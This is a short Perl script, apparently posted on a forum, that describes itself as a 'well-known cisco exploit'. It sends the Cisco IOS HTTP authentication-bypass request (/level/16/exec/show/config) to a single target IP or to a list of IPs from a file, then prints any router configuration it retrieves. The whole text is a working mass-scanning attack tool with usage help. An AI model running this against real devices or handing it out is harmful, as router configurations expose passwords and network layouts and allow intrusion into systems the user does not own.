کد:
#!/usr/bin/perl
$|=1;
## (c) th@bogus.net
## cisco HTTP configuration grabber -- well-known cisco exploit
##
## usage: -f <file with ip> or -t <target ip>
##
use Getopt::Long;
use LWP::UserAgent;
$cmd="/level/16/exec/show/config";
GetOptions("h",
"f=s" => \$file,
"t=s" => \$target);
if($opt_h) {
print "cisco-grabconfig.pl (c) 2002 th\@bogus.net","\n";
print "usage: cisco-grabconfig.pl [-h|-f <file>|-t <target>]","\n";
print " -h : this drivel","\n";
print " -f : file containing target ip's (one per line)","\n";
print " -t : target ip","\n";
print "grabs cisco configurations from hosts vulnerable to the HTTP","\n";
print "authentication bug (http://www.securiteam.com/securitynews/5PP0L2K4KY.html)","\n";
exit(1);
}
if($file && $target) {
print "ERROR: only -f or -t, please","\n";
exit(1);
}
if($file && -e $file) {
open(IN,$file);
while(<IN>) {
if(/^\s*(\d+\.\d+\.\d+\.\d+)\s*/) {
$targets{$1}=1;
}
}
close(IN);
}
if($target) {
GetConfig($target);
} else {
foreach $ip (keys %targets) {
GetConfig($ip);
}
}
if(!$opt_h && !$target && !$file) {
print "ERROR: i have no idea what you want (try -h)","\n";
exit(1);
}
exit(0);
sub GetConfig {
my($t) = @_;
my($ua,$request,$response);
$ua = LWP::UserAgent->new;
$ua -> agent ("Mozilla/5.0 (CGC (c) 2002 th\@bogus.net)");
$request = HTTP::Request->new("GET","http://$t/$cmd");
$response = $ua->request($request);
$response = $response->content;
if($response =~ /Using \d+ out of \d+ bytes/) {
print "\n!! found config on $t:","\n";
print STDOUT $response;
print "\n";
} else {
print "\n-- no config from $t","\n";
}